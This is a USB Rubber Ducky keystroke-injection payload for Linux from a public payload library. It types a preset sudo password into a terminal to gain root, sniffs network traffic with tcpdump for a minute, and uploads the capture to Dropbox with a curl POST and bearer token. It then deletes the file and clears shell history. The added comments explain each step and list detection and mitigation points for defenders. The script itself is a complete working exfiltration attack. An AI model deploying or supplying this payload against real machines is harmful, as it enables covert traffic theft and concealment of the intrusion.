hak5
GitHub Repository: hak5/usbrubberducky-payloads
Path: blob/master/payloads/library/exfiltration/ExfiltrateNetworkTraffic_Linux/payload.txt
REM #############################################
REM # |
REM # Title : Exfiltrate Network Traffic |
REM # Author : Aleff |
REM # Version : 1.0 |
REM # Category : Exfiltration |
REM # Target : Linux |
REM # |
REM #############################################

REM Requirements:
REM - Permissions
REM - Internet Connection

REM What the script below does, step by step: opens a terminal with Ctrl-Alt-T,
REM escalates to a root shell by typing a pre-set sudo password, runs tcpdump on
REM the default-route interface for the length of the DELAY in the capture
REM section, uploads the capture with one curl POST to the Dropbox upload API,
REM then deletes the capture and clears the root shell's history.
REM
REM Detection and mitigation notes for defenders (each maps to a line below):
REM - a freshly attached USB keyboard (HID) followed within seconds by a terminal
REM   launch and a sudo escalation; USB device authorization (e.g. USBGuard) or a
REM   locked screen stops the chain before the first keystroke is accepted
REM - the "sudo su" escalation is normally logged by sudo (syslog/journal), which
REM   the "history -c" at the end does not touch
REM - a tcpdump process writing a file, immediately followed by an HTTPS POST to
REM   content.dropboxapi.com; egress filtering or alerting on that host catches it
REM - the sudo password and the Dropbox bearer token are stored in cleartext in
REM   this file and on the device, so a lost device discloses both

REM REQUIRED: You need to know the sudo password and replace 'example' with this
REM (the value is typed literally at the sudo prompt further down)
DEFINE SUDO_PASS example
REM REQUIRED: Set what you want to sniff, for example tcp port 80
REM (this becomes the tcpdump filter expression; it is expanded unquoted below so
REM a multi-word filter is passed as separate tcpdump arguments)
DEFINE SNIFFING example
REM Set your Dropbox access token, or whatever you want to use to exfiltrate the sniff file
DEFINE TOKEN example
REM Just a Dropbox const: the upload endpoint used by the curl call below
DEFINE DROPBOX_API_CONST https://content.dropboxapi.com/2/files/upload
REM Output file path packets.pcap, remember to use pcap extension
DEFINE FILE example.pcap


REM Give the host a moment to enumerate the device, then open a terminal via the
REM desktop's Ctrl-Alt-T binding (assumes that shortcut is bound and the session
REM is unlocked; otherwise everything after this line is typed into nothing)
DELAY 1000
CTRL-ALT t
DELAY 2000


REM #### PERMISSIONS SECTION ####


REM Escalate to a root shell: "sudo su", a fixed wait, then the password constant.
REM There is no check that a prompt actually appeared; with cached sudo credentials
REM the password line would instead be typed as a command into the root shell.
REM Defender note: this escalation is normally logged by sudo regardless of the
REM "remove traces" section later on.
STRINGLN sudo su
DELAY 1000
STRINGLN SUDO_PASS
DELAY 1000


REM #### Network Traffic SECTION ####


REM Build shell variables from the DEFINE constants: each value is typed between
REM a leading STRING 'name="' and a closing STRING '"', then ENTER submits the
REM assignment.
STRING FILE_PATH="
STRING FILE
STRING "
ENTER
DELAY 500

STRING filter_expression="
STRING SNIFFING
STRING "
ENTER
DELAY 500

REM Network card name: field 5 of "ip route get 8.8.8.8" (assumes the usual
REM "via <gateway> dev <iface>" output shape; no fallback if there is no route)
STRINGLN net_card="$(ip route get 8.8.8.8 | awk '{ print $5; exit }')"
DELAY 500

REM Network dump, started in the background so the script can time it with DELAY.
REM $filter_expression is deliberately left unquoted (word-split into arguments).
STRINGLN tcpdump -i "$net_card" $filter_expression -w "$FILE_PATH" &
DELAY 500

REM Get PID of the background tcpdump ($! is the last background job)
STRINGLN tcpdump_pid=$!

REM Set how long you want to sniff (milliseconds; 60000 = one minute of capture)
DELAY 60000

REM Kill the process by PID; the capture stops here and the file is uploaded next
STRINGLN kill $tcpdump_pid


REM #### Exfiltrate SECTION ####
REM You can use whatever you want, i use Dropbox

REM Same STRING/STRING/STRING pattern to place the bearer token in a shell variable.
REM Defender note: the token is typed in the clear and sits in the root shell's
REM history until "history -c" below.
STRING ACCESS_TOKEN="
STRING TOKEN
STRING "
ENTER
DELAY 500

REM Destination path inside the Dropbox account (sent in the Dropbox-API-Arg header)
STRINGLN DROPBOX_FOLDER="/Exfiltration"
DELAY 500

REM Upload the capture with a single HTTPS POST to the Dropbox upload endpoint.
REM Defender note: outbound TLS to content.dropboxapi.com from a host that does
REM not normally use Dropbox, right after a tcpdump run, is the network-side
REM indicator here.
STRING curl -X POST
STRING DROPBOX_API_CONST
STRING --header "Authorization: Bearer $ACCESS_TOKEN" --header "Dropbox-API-Arg: {\"path\": \"$DROPBOX_FOLDER\",\"mode\": \"add\",\"autorename\": true,\"mute\": false}" --header "Content-Type: application/octet-stream" --data-binary "@$FILE_PATH"
ENTER


REM #### REMOVE TRACES ####


REM Delete the local capture file (plain rm; the uploaded copy is what remains)
STRINGLN rm "$FILE_PATH"
DELAY 500

REM Clear the root shell's in-memory history only. Defender note: sudo's own log
REM entry for the escalation, the outer user shell's history (which typically
REM still records "sudo su"), and any process/network telemetry are unaffected.
STRINGLN history -c
DELAY 500

REM Exit from Sudo user
STRINGLN exit
DELAY 500

REM Close the shell
STRINGLN exit